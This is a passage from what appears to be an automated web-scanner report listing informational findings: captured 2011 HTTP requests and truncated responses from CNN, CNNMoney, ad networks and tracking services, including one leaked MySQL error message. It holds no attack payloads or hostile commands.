X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:59 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:04 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2607

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="/2011/08/15/technology/thebuzz/index.htm" class="summaryImg"><img border="0" src="http://i2.cdn.turner.co
...[SNIP]...

18.65. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.video.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.video.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.video.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; __csref=http%3A%2F%2Fwww.cnn.com%2F; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; __cst=1f26c5e6b085462f; __csv=9532635152fbdebd|0; __csnv=1f68e1e8c399528f; __ctl=9532635152fbdebd1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:57 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:47:53 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 1540

<div class="col1">
   <div class="boxHeading">Featured Article</div>
   <a href="#"><img src="/stcejorp/dh/Redesigns/2011/ORIGINALS/HEDFOOT/images/feature-article.png" alt="Feature Article" class="summa
...[SNIP]...

18.66. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.wallstreet.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/auto/5.0/navigation/flyout.wallstreet.html

Request

GET /.element/ssi/auto/5.0/navigation/flyout.wallstreet.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:45:59 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2746

<div class="col1"><div class="boxHeading">Top Story</div><div class="summaryBlock"> <a href="http://finance.fortune.cnn.com/2011/08/15/tom-forester-fund-manager-volatility/" class="summaryImg"><img
...[SNIP]...

18.67. http://money.cnn.com/.element/ssi/tools/5.0/bubble.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/tools/5.0/bubble.html

Request

GET /.element/ssi/tools/5.0/bubble.html HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:02 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:55 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 649

   <div id="popbubble" class="popbub">
       <div class="brdr-top">
           <div class="brdr-cornerL"></div>
           <div class="brdr-mid"><div class="pinch"></div></div>
           <div class="brdr-cornerR"></div>
       </
...[SNIP]...

18.68. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/video/5.1/players/story.player.html

Request

GET /.element/ssi/video/5.1/players/story.player.html?p=0&d=72576981 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 1710

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>CNNMoney video player</title>
<!--[if LT IE 7]>
<link rel="stylesheet" type="text/css" href="http://i.cdn.tur
...[SNIP]...

18.69. http://money.cnn.com/fn_adspaces/creatives/2010/4/14/336x260_survey.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /fn_adspaces/creatives/2010/4/14/336x260_survey.html

Request

GET /fn_adspaces/creatives/2010/4/14/336x260_survey.html?imp=%3Cimg%20src%3D%22http%3A//ads.cnn.com%3A80/event.ng/Type%3Dcount%26amp%3BClientType%3D2%26amp%3BASeg%3D%26amp%3BAMod%3D%26amp%3BAOpt%3D0%26amp%3BAdID%3D484298%26amp%3BFlightID%3D352508%26amp%3BTargetID%3D104053%26amp%3BSiteID%3D1589%26amp%3BEntityDefResetFlag%3D0%26amp%3BSegments%3D1822%2C2244%2C2743%2C3285%2C6298%2C6520%2C6593%2C7043%2C8598%2C10240%2C12385%2C17251%2C18961%2C19419%2C22177%2C25342%2C25344%2C25412%2C26320%2C32749%2C32922%2C33852%2C34172%2C34575%2C35306%2C37498%2C40253%2C45546%2C45604%2C46096%2C46694%2C47399%2C48618%2C48619%2C48716%2C49072%2C49727%2C50778%2C50779%2C50825%2C51060%2C51253%2C51392%2C51684%2C51759%2C52030%2C52032%2C52082%2C52207%2C52256%2C52366%2C52376%2C52423%2C52592%2C52690%2C52746%2C52830%2C52835%2C52872%2C52939%2C52979%2C53014%26amp%3BTargets%3D1515%2C65556%2C104053%26amp%3BValues%3D46%2C60%2C81%2C100%2C150%2C682%2C685%2C686%2C917%2C1067%2C1285%2C1589%2C1678%2C1686%2C1735%2C3458%2C4443%2C37359%2C47128%2C47457%2C52263%2C52901%2C56058%2C56872%2C58702%2C58848%2C61263%2C61887%2C61908%2C61913%2C63267%2C116729%2C116771%26amp%3BRawValues%3DNGUSERID%252Caa55a22-30407-167278533-1%252CTIL%252C1313433990029%26amp%3Brandom%3DwKWihu%2CbhesAkRdoyAqs%26amp%3BParams.tag.transactionid%3D%26amp%3BParams.User.UserID%3Daa55a22-30407-167278533-1%22%20width%3D%221%22%20height%3D%221%22%20border%3D%220%22%20/%3E HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:57 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:57 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 5587

<html>
<head>
<title>CNNMoney.com</title>

<script>

function createCookie(name, value)
{
var date = new Date("January 1, 3000");
var expires = "; expires="+date.toGMTString();

d
...[SNIP]...

18.70. http://myseofriend.net/myseofriendlog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://myseofriend.net
Path:   /myseofriendlog.php

Request

GET /myseofriendlog.php?page_url=aHR0cDovL3d3dy56ZWRvLmNvbS8=&page_title=WkVETyBBZHZlcnRpc2luZyBUZWNobm9sb2d5IFBhcnRuZXI=&event_type=YmFzZS5wYWdlX3JlcXVlc3Q=&site_id=ZDFjOTFhODc2OWZiZGRlNWEyOTRmZjgxMGY5NjBkZDA=&startTime=MTMxMzQzNDU5NA==&referrer=&search_referer=&currTime=MTMxMzQzNDU5NA==&&backlink=1&pageview=1&paidvisit=0 HTTP/1.1
Host: myseofriend.net
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 346
Content-Type: text/html


Warning: mysql_connect(): Host 'ec2-50-19-253-119.compute-1.amazonaws.com' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' in /mnt/docroot/myseofriend.net/config.p
...[SNIP]...

18.71. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1795&ref2=http://www.redhat.com/&tzo=360&ms=323 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.redhat.com/products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=1A97B82F8A23464F9D7A7339E98EF168; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Mon, 15 Aug 2011 19:05:49 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

18.72. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Request

GET /getSegment.php?purl=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&jsref=http%3A%2F%2Fwww.cnn.com%2F&rnd=1313434014019 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE4fCaYVTTzg6idhAg==; __utma=164916925.1552640890.1311173480.1313198275.1313267590.6; __utmz=164916925.1313267590.6.6.utmcsr=msdn.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/scriptjunkie/gg454786.aspx

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 15 Aug 2011 18:45:58 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 73

<html><head><title>ShareThis Segmenter</title></head><body></body></html>

18.73. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1723
Date: Mon, 15 Aug 2011 18:26:04 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:03 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1780682826=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:04 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:04 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

18.74. http://svcs.cnn.com/weather/getForecast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://svcs.cnn.com
Path:   /weather/getForecast

Request

GET /weather/getForecast?time=46&mode=json_html&zipCode=31041&locCode=09GA&celcius=false&csiID=csi3 HTTP/1.1
Host: svcs.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:12 GMT
Server: Apache
Content-type: text/html
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=900
Expires: Mon, 15 Aug 2011 18:53:51 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 17092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><script type="text/javascript">var cnnDocDomain=''; if(location.hostname.indexOf('cnn.com')>0) { cnnDocDomain='cnn.com'; }
...[SNIP]...

18.75. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=pH430013111733250028; aceRTB=rm%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cam%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cdc%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Can%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Crub%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7C; GUID=MTMxMzE5ODMwNTsxOjE3NGJrNzAwYWI2NjZtOjM2NQ; C2=XhWSOlLuFYRxGPJq5EwFbZwaq+WAsVmBIjKOAMxWGoFtbLQtuaoDKMtrGaMZjMrhGLoIH0bSF81moVmfzZwlzS+B8pqBfVmfqawlSK8BItdRueQ3WXkrwaHCW8oh+AK9IU1IGZE; F1=BcFaJ5kAAAAAd3ADAEAAgEgAAAAA9iCDAEAAODABAAAABAAAAIAAODA; BASE=6cQnylHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnAW4DkJw8N!; ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatvUjH3ic0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 16 Aug 2011 17:56:42 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:41:44 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

18.76. http://ui.tudou.com/js/embed/xstorage/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.tudou.com
Path:   /js/embed/xstorage/index.html

Request

GET /js/embed/xstorage/index.html HTTP/1.1
Host: ui.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 14 Apr 2010 04:28:00 GMT
Keep-Alive: timeout=25, max=9965
Expires: Sun, 12 Apr 2020 06:44:23 GMT
Cache-Control: max-age=273706630
X-Cache: HIT
Content-Length: 122
Date: Mon, 15 Aug 2011 18:56:06 GMT
Server: lighttpd

<!DOCTYPE html>
<meta charset="gbk"/>
<title>nothing here</title>
<script>
document.domain = 'tudou.com';
</script>

18.77. http://www.ask.com/display.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /display.html

Request

GET /display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x100&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x100;pos=mr2;log=0;s=as;hhi=159;test=0;ord=1313432642381? HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
ETag: W/"4842-1313089226000"
Last-Modified: Thu, 11 Aug 2011 19:00:26 GMT
Content-Type: text/html
Content-Length: 4842
tr-request-id: TkUERgpcQXAAACOEDc8AAAJW
from-tr: trafrt002iad.io.askjeeves.info
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:24:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;

...[SNIP]...

18.78. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

Request

GET /.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html?&csiID=csi4 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
